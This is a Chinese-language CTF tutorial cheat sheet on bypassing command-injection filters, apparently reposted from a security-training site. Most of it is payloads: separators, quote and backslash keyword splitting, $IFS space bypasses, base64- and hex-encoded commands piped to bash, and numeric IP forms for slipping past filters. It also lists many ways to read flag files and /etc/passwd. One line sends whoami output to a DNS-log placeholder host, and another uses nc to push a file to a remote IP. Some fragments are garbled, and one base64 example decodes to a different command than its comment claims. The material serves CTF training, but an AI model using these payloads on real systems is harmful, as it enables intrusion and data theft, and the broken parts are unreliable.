CTF中的命令执行绕过方式

引言

不论在CTF还是实战中，命令执行的场景五花八门，那么往往在一些小型比赛中，会以那种PING接口进行getflag操作。

0x01：管道符

在用linux命令时候,我们可以一行执行多条命令或者有条件的执行下一条命令，下面我们讲解一下linux命令分号”分号用法

方式：command1 ; command2

用;号隔开每个命令, 每个命令按照从左到右的顺序,顺序执行， 彼此之间不关心是否失败， 所有命令都会执行。

“| ”管道符用法

上一条命令的输出，作为下一条命令参数。ctf里面：ping 127.0.0.1 | ls(只执行ls不执行前面的）

方式：command1 | command

Linux所提供的管道符“|”将两个命令隔开，管道符左边命令的输出就会作为管道符右边命令的输入。连续使用管道意味着第一个命令的输出会作为 第二个命令的输入，第二个命令的输出又会作为第三个命令的输入，依此类推。

利用一个管道：

# rpm -qa|grep licq

这条命令使用一个管道符“|”建立了一个管道。管道将rpm -qa命令的输出（包括系统中所有安装的RPM包）作为grep命令的输入，从而列出带有licq字符的RPM包来。

利用多个管道：

# cat /etc/passwd | grep /bin/bash | wc -l

这条命令使用了两个管道，利用第一个管道将cat命令（显示passwd文件的内容）的输出送给grep命令，grep命令找出含有“/bin /bash”的所有行；第二个管道将grep的输出送给wc命令，wc命令统计出输入中的行数。这个命令的功能在于找出系统中有多少个用户使用bash。

“then echo "192.168.1.1 is UP!" else echo "192.168.2.1 is DOWN!" fi

注意 flag.txt cat>flag.txt ca\t fl\ag

kg=$'\x20flag.txt'cat index.php

利用DNS管道解析：

这里提供一个在线网址，可以直接进行给一个利用网址：admin.dnslog.link注册一个账号后会分配一个子域名可以利用。

|curl `whoami`.http://xxxx.xxx(子域名)

这样就会在利用网址看到反弹结果。（这里也不演示了，账号忘记了。。。）这里解释一下\whoami\因为`反引号在linux下是执行命令的特殊符号，原理请见：

http://mp.weixin.qq.com/s/jwqWnP0FHhMoR5b6iCS6NQ

网络地址转化为数字地址

网络地址有另外一种表示形式，就是数字地址比如127.0.0.1可以转化为2130706433

可以直接访问

http://2130706433

或者http://0x7F000001

这样就可以绕过.的ip过滤，这里给个转化网址：

http://www.msxindl.com/tools/ip/ip_num.asp

通过查看文件的权限 chmod +777赋予权限
l's' -la
c'h'm'o'd +777 /filename

代替cat的命令

cat:由第一行开始显示内容，并将所有内容输出

tac:从最后一行倒序显示内容，并将所有内容输出

more:根据窗口大小，一页一页的现实文件内容

less:和more类似，但其优点可以往前翻页，而且进行可以搜索字符

head:只显示头几行

tail:只显示最后几行

nl:类似于cat -n，显示时输出行号

tailf:类似于tail -f

sort%20/flag 读文件

dir来查看当前目录文件

Linux花式读取文件内容

ps:目标是获取flag.txt的内容

static-sh读取文件：

static-sh ./flag.txt

#输出结果：

./flag.txt: line 1: flag{this_is_a_test}: not found

paste读取文件:

paste ./flag.txt /etc/passwd

#输出结果：

flag{this_is_a_test}

root:x:0:0:root:/root:/bin/bash

daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin

bin:x:2:2:bin:/bin:/usr/sbin/nologin

sys:x:3:3:sys:/dev:/usr/sbin/nologin

sync:x:4:65534:sync:/bin:/bin/sync

diff读取文件 :

diff ./flag.txt /etc/passwd

#输出结果：

1c1,45 flag{this_is_a_test}\ No newline at end of file---> root:x:0:0:root:/root:/bin/bash> daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin> bin:x:2:2:bin:/bin:/usr/sbin/nologin> sys:x:3:3:sys:/dev:/usr/sbin/nologin> sync:x:4:65534:sync:/bin:/bin/sync

od读取文件

od -a ./flag.txt

#输出结果：

0000000 f l a g { t h i s _ i s _ a _ t0000020 e s t }0000024

bzmore读取文件:

bzmore ./flag.txt

bzless读取文件：

bzless ./flag.txtecho `bzless ./flag.txt`

#输出结果：

------> ./flag.txt ------ flag{this_is_a_test} 

curl读取文件：

curl file:///home/coffee/flag

nc 传输文件

靶机：

nc 10.10.10.10 4444 /var/www/html/key.php

接受机：

nc -l 4444 > key.txt

wget操作进行目标读取

wget url -P path

一些命令分隔符

linux中：%0a 、%0d 、; 、a=fl;b=ag.php;cat $a$b

其中有这么一条过滤方法，我们用上述方法无法绕过，但是我们只要改变一下顺序就可以：1;a=ag.php;b=fl;cat $b$a绕过空格就用上面提到的$IFS$1完整的payload 1;a=ag.php;b=fl;cat$IFS$1$b$aelse if(preg_match("/.*f.*l.*a.*g.*/", $ip)){die("fxck your flag!");}

编码绕过

base64：

echo YWJjZGU=|base64 -d //打印出来abcde

echo Y2F0IGZhbGcucGhw|base64 -d|bash //cat flag.php

echo Y2F0IGZhbGcucGhw|base64 -d|sh //cat flag.php

hex编码绕过：

echo 63617420666c61672e706870 | xxd -r -p|bash //cat flag.ph

unicode编码

$(printf “\154\163”) //ls

$(printf “\x63\x61\x74\x20\x66\x6c\x61\x67\x2e\x70\x68\x70”) //cat flag.php

对于关键字还可以用单引号和反斜杠绕过 比如 cat fl’'ag cat fl\ag

总结一下，payload1;a=ag.php;b=fl;cat$IFS$1$b$a和 cat$IFS$1`ls`

得到的flag查看源码。

0x03：总结

对于此类题目常考于大学招新赛、机关企业内部CTF比赛、渗透证书的考察点等等，难度不大，就是在于姿势的积累。

转载请注明来自网盾网络安全培训，本文标题：《CTF中的命令执行绕过方式》

标签：CTF